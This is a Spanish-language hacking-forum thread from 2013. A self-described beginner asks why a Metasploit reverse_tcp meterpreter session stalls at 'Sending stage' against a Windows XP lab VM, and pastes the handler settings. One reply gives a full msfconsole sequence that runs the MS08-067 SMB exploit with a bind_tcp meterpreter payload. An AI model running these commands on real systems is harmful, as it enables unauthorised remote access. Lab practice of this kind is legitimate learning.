elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  No consigo meterpreter pero si la shell
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: No consigo meterpreter pero si la shell  (Leído 4,354 veces)
fekaa

Desconectado Desconectado

Mensajes: 1


El aprendizaje te lleva a lo GRANDE.


Ver Perfil
No consigo meterpreter pero si la shell
« en: 13 Febrero 2013, 23:41 pm »

Buen día estimados.

Estoy intentando obtener la meterpreter a través de reverse_tcp en Windows desde Linux con el metasploit.

El problema es que una shell consigo obtener perfectamente. Cuando la máquina víctima ejecuta el .exe que generé anteriormente, no hay problema; si intento obtener una sesión meterpreter, la salida en el metasploit es la siguiente:

Citar
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.102    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

  • Started reverse handler on 192.168.1.102:4444
  • Starting the payload handler...
  • Sending stage (752128 bytes) to 192.168.1.110
El problema es que se queda en

  • Sending stage (752128 bytes) to 192.168.1.110[/b]

    y luego no pasa nada.

    Soy principiante, recién ayer me puse a ver todo ésto del Metasploit y la verdad me interesa muchísimo; mis intenciones no son malas en ningún lugar, por eso hago pruebas locales, simplemente para aprender a proteger mi propio equipo por empezar.

    La máquina víctima es una máquina virtual con Windows XP SP3 "pelado" (entendiéndose el término "pelado" como a un windows recién instalado, y sin ningun soft extra)

    Saludos y gracias.
En línea

"Cuanto más sabes, más te das cuenta de que no sabes nada" - Sócrates
alister


Desconectado Desconectado

Mensajes: 513


Ver Perfil
Re: No consigo meterpreter pero si la shell
« Respuesta #1 en: 14 Febrero 2013, 04:16 am »

juega a cambiar la EXITFUNC
 
En línea

Back 2 business!
basdi

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: No consigo meterpreter pero si la shell
« Respuesta #2 en: 5 Noviembre 2013, 08:52 am »

amigo intenta esto y después comenta:
 use exploit /windows/smb/ms08_067_netapi
set rhost 192.xxx.x.xx (ip victima )
set payload windows/meterpreter/bind_tcp
set lhost 192.xxx.x.xx (ip atacante)
explloit
 si tu sistema es xp virgen (pelado ) si no consigues el Shell lee esto quizás hay esta tu respuesta http://www.blackploit.com/2009/11/por-que-no-consigo-shell-con-mi.html
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
XLSInjector – Inyectar Shell Meterpreter en Archivos Excel
Hacking
Shell Root 9 9,818 Último mensaje 10 Febrero 2010, 20:42 pm
por illera88
Donde consigo la shell c99.. urgente..
Nivel Web
GeorgeEcuador 5 5,292 Último mensaje 23 Noviembre 2011, 05:54 am
por Shell Root
[Ayuda] Metasploit winxp sp3 no consigo la shell
Hacking
krowa 5 4,723 Último mensaje 6 Noviembre 2013, 01:12 am
por aivx
auditando en windows pero no me llega la session meterpreter
Bugs y Exploits
r0071n73ct0r 7 5,214 Último mensaje 25 Diciembre 2018, 18:47 pm
por die595tack067
comando meterpreter shell android [Solucionado]
Bugs y Exploits
N3GR0 1 5,834 Último mensaje 29 Junio 2019, 20:48 pm
por N3GR0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines